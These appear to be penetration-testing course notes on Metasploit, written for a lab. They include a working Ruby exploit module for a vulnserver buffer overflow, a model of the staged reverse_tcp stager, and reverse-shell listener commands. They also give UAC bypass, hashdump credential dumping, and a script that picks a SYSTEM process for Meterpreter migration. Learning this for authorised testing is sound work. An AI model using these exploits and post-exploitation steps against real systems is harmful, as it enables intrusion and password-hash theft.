We have used Metasploit previously in past modules of this course: we've generated shellcode, calculated buffers, and translated assembly into opcodes using utilities from this framework. So what exactly is it? As described by its authors, the Metasploit Framework is an advanced open-source platform written in Ruby for developing, testing and using exploit code.

Metasploit can be handy in almost any phase of a penetration test, from passive and active information gathering to vulnerability research and exploit development, all the way to client-side attacks and post-exploitation techniques.

There are several user interfaces that we can use to operate the Metasploit Framework. The most popular is the interactive console, msfconsole.

MSF requires several services to be running that are not enabled at boot time in Kali Linux.

To start the required postgresql and metasploit service dependencies we can simply start them as we would any other service. (These are the init scripts of the Kali release these notes were written against; on current Kali there is no separate metasploit service: run `msfdb init` once to create the database and its user, then `systemctl start postgresql` before launching msfconsole.)
#/etc/init.d/postgresql start
#/etc/init.d/metasploit start

Now that everything is set up, we can start exploring the various exploits, auxiliary modules, payloads and plugins that the Metasploit Framework has to offer us.

To start the msfconsole
#msfconsole

The help command can get us started with the basic options msf has to offer.
msf>help

The Metasploit Framework contains hundreds of auxiliary modules which provide functionality such as protocol enumeration, host discovery and more. These modules all follow a common usage syntax, which makes them easy to explore and use. Let's try some of these auxiliary modules and get a feel for the syntax needed to run the framework.

The "show auxiliary" command displays a long list of all the auxiliary modules in the Metasploit Framework. They are grouped by task: information gathering modules live under the 'gather' hierarchy, scanning and enumeration of various services under the 'scanner' hierarchy, and so on.

If the metasploit and postgresql services are started ahead of time, the Metasploit Framework will log its findings and information about discovered hosts in a convenient and accessible database. To display all hosts discovered up to this point, we can issue the 'hosts' command from within msfconsole.

msf>hosts

To further populate this database, we can use the db_nmap wrapper to scan hosts with nmap and have the scan output inserted into the database.

msf>db_nmap 10.11.1.1-254 --top-ports 20

Once the scan is done, we can query the database for machines with specific properties. For example, we can look for all machines with port 443 open.

msf>services -p 443

=============================================================
You can search for all the modules affecting a particular platform using the built-in search functionality of msfconsole. For example,

msf> search platform:"Windows XP SP3" type:exploit

should find all the exploit modules affecting Windows XP SP3. Try other search terms as well, such as "Windows XP Service Pack 3", to get an idea of what matches; the search is keyword based, so wording matters.
==============================================================

Using the database - check out the looting commands towards the end.
https://www.offensive-security.com/metasploit-unleashed/using-databases/

Up to now, we have limited our payload use in Metasploit to simple, standard reverse shell payloads.

Let's take some time to examine some additional payloads that the Metasploit Framework has to offer. One of the first distinctions that is important to note is the one between staged and non-staged (single) payloads.

A non-staged (single) payload is sent in its entirety in one go, as we have done up to this point.

A staged payload is usually sent in two parts. The first is a small primary payload (the stager) which instructs the victim to connect back to the attacker, receive the larger secondary payload (the stage) and then execute it. In Metasploit's naming, a slash separates stager and stage (windows/meterpreter/reverse_tcp), whereas a single payload uses an underscore (windows/shell_reverse_tcp).
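To make the staged exchange concrete, here is an added example (not code from these notes or from Metasploit itself) that models both sides of the reverse_tcp stager protocol in Ruby: the handler sends a 4-byte little-endian length prefix followed by the stage, and the stager reads the prefix and then exactly that many bytes. The stage bytes are constructed placeholder data, not a real Meterpreter DLL, and the size check in the stager is an added defensive touch that the real stager does not perform.

```ruby
require 'socket'

# Constructed stand-in for a real stage (the Meterpreter stage is a DLL);
# here it is just bytes so the exchange can be run locally.
SAMPLE_STAGE = ("\x90" * 16 + "stage-bytes").b

# Handler side (what exploit/multi/handler does for a staged reverse_tcp
# payload): accept one connection, send a 4-byte little-endian length,
# then the stage itself. Returns the OS-assigned port and the server thread.
def serve_stage(stage, host = '127.0.0.1')
  server = TCPServer.new(host, 0)          # port 0 => OS picks a free port
  port = server.addr[1]
  thread = Thread.new do
    begin
      client = server.accept
      client.write([stage.bytesize].pack('V') + stage)
    rescue SystemCallError, IOError
      # peer went away early (e.g. stager rejected the size); nothing to do
    ensure
      client&.close
      server.close
    end
  end
  [port, thread]
end

# Stager side (what the small primary payload does): connect back, read the
# length prefix, then read exactly that many bytes. A real stager would now
# execute the stage; here we simply return it.
def fetch_stage(host, port, max_size = 16 * 1024 * 1024)
  sock = TCPSocket.new(host, port)
  header = sock.read(4)
  raise "short length header" unless header && header.bytesize == 4
  size = header.unpack1('V')
  raise "stage too large: #{size}" if size > max_size  # added check, not in the real stager
  stage = sock.read(size)
  raise "truncated stage" unless stage && stage.bytesize == size
  stage
ensure
  sock&.close
end

# Run both sides locally and hand back whatever the stager received.
def demo
  port, thread = serve_stage(SAMPLE_STAGE)
  got = fetch_stage('127.0.0.1', port)
  thread.join
  got
end
```

The 4-byte prefix is the reason staged payloads are so small: the stager only needs enough code to connect, read a length and read that many bytes into memory, while everything else lives in the stage that the handler ships after the connection is established.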

One of the most powerful staged payloads that the Metasploit Framework has to offer is the Meterpreter payload. Meterpreter is a staged, multi-function payload that can be dynamically extended at run time by loading extensions. In practice this means that the Meterpreter shell provides more features and functionality than a regular shell, with built-in file upload and download, keylogging, and so on. This additional functionality makes Meterpreter the favourite and most commonly used payload in the Metasploit Framework.

Let's get a taste of the Meterpreter payload by swapping out our non-staged reverse shell for a reverse Meterpreter connection in our SLMail exploit.

Meterpreter simplifies many post-exploitation processes such as uploading and downloading files. Let's try uploading netcat to the victim machine and downloading it again using the Meterpreter upload and download commands.

Metasploit offers us a huge variety of shellcode payloads, from payloads that connect to a victim machine using VNC to payloads which tunnel themselves out of an organisation using DNS queries. Getting to know these various payloads can help us significantly during a penetration test.

For example, the reverse Meterpreter HTTPS payload (windows/meterpreter/reverse_https) encapsulates Meterpreter communications within HTTPS requests, which lets it pass through many deep packet inspection filters and web proxies that would block a raw TCP connection.

Another nice example is the reverse_tcp_allports payload, which attempts to connect back to our attacking machine on every port in turn, which is useful in situations where we are not sure what egress firewall rules are in place. On the attacking side the handler still listens on a single port, so the usual setup is an iptables redirect of all incoming TCP ports to that handler port.

The Metasploit Framework not only has a wide range of available payloads, but can also output these payloads in various file types and formats such as ASP, VBScript, Java executables, Windows DLLs, PE binaries and more.

Let's take a look at the msfvenom utility and get a listing of the payloads available to us.

#msfvenom -l payloads

This produces a really long list of all the different types of payloads that msfvenom can generate.

Now edit the template exploit module that was just copied over.
#nano vulnserver.rb

Start by changing the name, description and author of the exploit.

Update the space available for the shellcode: 800 bytes.
Update the return address to match the one that we used in our Python code: 0x65d11d71.
Update the target description to "Universal JMP ESP address".
Update the default RPORT to 5555.

Now it is time to recreate our exploit buffer within this Ruby exploit module.
Remove the previous buffer setup for the SLMail exploit.
For reference purposes, paste the buffer taken from the Python exploit (as a comment).
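The following is an added example of what the finished module can look like once the values from the steps above are filled in; it is not the module from the course PDF or from the Metasploit tree. RPORT 5555, 800 bytes of payload space, the return address 0x65d11d71 and the target name come from these notes. The offset to EIP (2003 bytes) and the "TRUN /.:/" command prefix are assumptions the notes never record, so take them from your own Python PoC. The `unless defined?` stub at the top exists only so the buffer-building helper can be unit-tested outside msfconsole; inside the framework `Msf` is already loaded and the stub is skipped.

```ruby
# Minimal stubs so the file also loads outside msfconsole (for testing
# build_buffer). Inside the framework Msf::Exploit::Remote exists and
# this whole block is skipped.
unless defined?(Msf::Exploit::Remote)
  module Msf
    class Exploit
      class Remote
        module Tcp; end
      end
    end
  end
  NormalRanking = 300
end

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp

  # Pure helper: command prefix, junk up to EIP, JMP ESP address
  # (little-endian), NOP sled, then the payload. Kept framework-free so it
  # can be tested standalone. offset and prefix are ASSUMED values; the
  # notes only fix the return address and the 800-byte payload space.
  def self.build_buffer(payload, ret: 0x65d11d71, offset: 2003, nops: 16, prefix: "TRUN /.:/")
    raise ArgumentError, "payload exceeds the 800 byte space" if payload.bytesize > 800
    buf = prefix.b                  # force binary so non-ASCII bytes concatenate cleanly
    buf << ("A".b * offset)
    buf << [ret].pack("V")          # 0x65d11d71 -> "\x71\x1d\xd1\x65"
    buf << ("\x90".b * nops)
    buf << payload.b
    buf
  end

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Vulnserver TRUN Buffer Overflow',
      'Description'   => %q{ Stack buffer overflow in vulnserver's TRUN command. },
      'Author'        => ['course notes'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Payload'       => { 'Space' => 800, 'BadChars' => "\x00" },
      'Targets'       => [['Universal JMP ESP address', { 'Ret' => 0x65d11d71 }]],
      'DefaultTarget' => 0))
    register_options([Opt::RPORT(5555)])
  end

  def exploit
    connect
    buf = self.class.build_buffer(payload.encoded, ret: target.ret)
    print_status("Sending #{buf.length} byte buffer to #{rhost}:#{rport}")
    sock.put(buf)
    handler
    disconnect
  end
end
```

Drop the file into a module directory (for example ~/.msf4/modules/exploits/windows/misc/) so msfconsole picks it up, then `use` it, set RHOST and a payload, and `exploit`. Keeping the buffer construction in a plain class method means the byte layout can be checked against the Python PoC before a single packet is sent.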

Make sure that the vulnerable server is running on the windows machine by running the shortcut in the tools directory.

msf>exploit

We have a shell.

============================================

See exercise 7.8.1.2.

Listener:
#nc -nvlp 443

Execute the exploit
#python vulnBO-4.py 10.11.25.139

============================================

1. Create a new directory in the Metasploit modules tree.
2. Create a new file in this directory and copy in the contents of the example exploit from the PDF.
3. Test using this exploit as is.
4. Adjust the values to match what I have in my exploit cross-poc-shell.py.
5. Test the exploit once more.

This is now working and the exploit is saved as crossfireSaidshow2.rb.

So far we have seen file uploads and downloads along with simple session management; however, the Metasploit Framework has much more to offer in this field, from privilege escalation and dumping Windows hashes to running keyloggers and even taking screenshots of the victim machine. But before we get started it is crucial to get a full understanding of the privileges we have on the system, especially when working with a Windows OS.

Let's use a reverse Meterpreter shell as an example.

While our shell may have been run by an admin user, we may still face restrictions such as UAC, or require process migration for our post-exploitation modules to work.

The getuid command shows that we have the privileges of the 'offsec' user. We already know that this user is a local administrator.

meterpreter>getuid

The getprivs command lists the privileges enabled in the current process token. A short list, despite the user being an administrator, tells us that UAC has handed us the filtered (restricted) token rather than the full admin one.

meterpreter>getprivs

This means that if we try to run a post-exploitation module such as 'hashdump', it may fail because the restricted token lacks the privileges the module needs. In this case we first need to bypass UAC.

In order to bypass UAC, first background the current Meterpreter session:
meterpreter>background

Now invoke a Metasploit module that is able to bypass UAC, pointing it at the backgrounded session:

msf>use exploit/windows/local/bypassuac

msf>set SESSION 1

msf>set PAYLOAD windows/meterpreter/reverse_tcp

msf>set LHOST 10.11.0.179

msf>set LPORT 8888 (NOTE: this must be a port that is not already in use, i.e. a different port from the one the original session's handler is listening on.)

msf>run

This uploads a file to the target and executes a new reverse shell with improved privileges. Confirm with getprivs that the new session now has a much larger set of privileges, i.e. the full, unfiltered administrator token.

meterpreter>getprivs

Now that we have a non-UAC-restricted admin shell, let's try hashdump once more.

meterpreter>hashdump

This fails once more: this module needs to run with SYSTEM privileges, since the hashes are read out of the SAM, which an administrator token alone cannot open.

To solve this problem we can migrate the Meterpreter session into an existing process that is already running as SYSTEM, such as the SNMP service.

List all running processes, along with the user each one runs as, using the ps command.

meterpreter>ps

Let's have Meterpreter migrate into this process (PID 1468 in this case; take the PID from your own ps output, as it changes from boot to boot).

meterpreter>migrate 1468
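Hard-coding a PID such as 1468 only works for one boot of one machine. The following added example (not from these notes or from Metasploit) does the ps-then-migrate step programmatically in Ruby: it filters the process list for SYSTEM processes of the right architecture, skips processes whose death would take the box down, prefers the SNMP service like the walkthrough above, and only then migrates. Inside a live Meterpreter session it relies on `client.sys.process.get_processes`, which returns hashes with 'pid', 'name', 'user' and 'arch' keys, and on `client.core.migrate`; outside a session the constructed SAMPLE_PS list stands in for that output, and the assumption that sysinfo's Architecture string uses the same 'x86'/'x64' form as the process list is marked in the code.

```ruby
# Constructed stand-in for client.sys.process.get_processes output.
SAMPLE_PS = [
  { 'pid' => 4,    'name' => 'System',       'user' => 'NT AUTHORITY\\SYSTEM', 'arch' => 'x86' },
  { 'pid' => 1468, 'name' => 'snmp.exe',     'user' => 'NT AUTHORITY\\SYSTEM', 'arch' => 'x86' },
  { 'pid' => 1812, 'name' => 'explorer.exe', 'user' => 'WIN7\\offsec',         'arch' => 'x86' },
  { 'pid' => 2240, 'name' => 'lsass.exe',    'user' => 'NT AUTHORITY\\SYSTEM', 'arch' => 'x86' },
].freeze

# Processes we never migrate into: if the injected thread crashes them,
# the machine reboots or becomes unusable.
AVOID = %w[System lsass.exe csrss.exe smss.exe wininit.exe winlogon.exe services.exe].freeze

# Return the PID of a process running as SYSTEM, matching our architecture
# and not on the avoid list. Preferred names are tried first (SNMP, as in
# the notes); falls back to any remaining candidate; nil if none qualifies.
def pick_migration_target(processes, arch:, preferred: ['snmp.exe', 'spoolsv.exe', 'svchost.exe'])
  candidates = processes.select do |p|
    p['user'] == 'NT AUTHORITY\\SYSTEM' &&
      p['arch'] == arch &&
      !AVOID.include?(p['name'])
  end
  preferred.each do |name|
    hit = candidates.find { |p| p['name'].casecmp?(name) }
    return hit['pid'] if hit
  end
  candidates.first&.fetch('pid')
end

# Meterpreter entry point: only runs when loaded inside a live session,
# where the framework provides `client` and the print_* helpers.
if defined?(client) && client
  procs = client.sys.process.get_processes
  # ASSUMPTION: sysinfo['Architecture'] is 'x86' or 'x64', matching the
  # 'arch' values in the process list.
  pid = pick_migration_target(procs, arch: client.sys.config.sysinfo['Architecture'])
  if pid
    print_status("Migrating to PID #{pid}")
    client.core.migrate(pid)
    print_good("Now running as #{client.sys.config.getuid}")
  else
    print_error("No suitable SYSTEM process found; try bypassuac or getsystem first")
  end
end
```

Run it from the session with `run /path/to/this_file.rb`. Matching the architecture matters because migrating an x86 Meterpreter into an x64 process (or vice versa) fails, and the avoid list is there because a failed injection into lsass.exe or csrss.exe does not just lose the session, it crashes the target.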

A getuid command should now show that the Meterpreter process is running as NT AUTHORITY\SYSTEM.

meterpreter>getuid

Hashdump now completes successfully.

meterpreter>hashdump

Background this second, SYSTEM-privileged shell and list all the sessions that we currently have: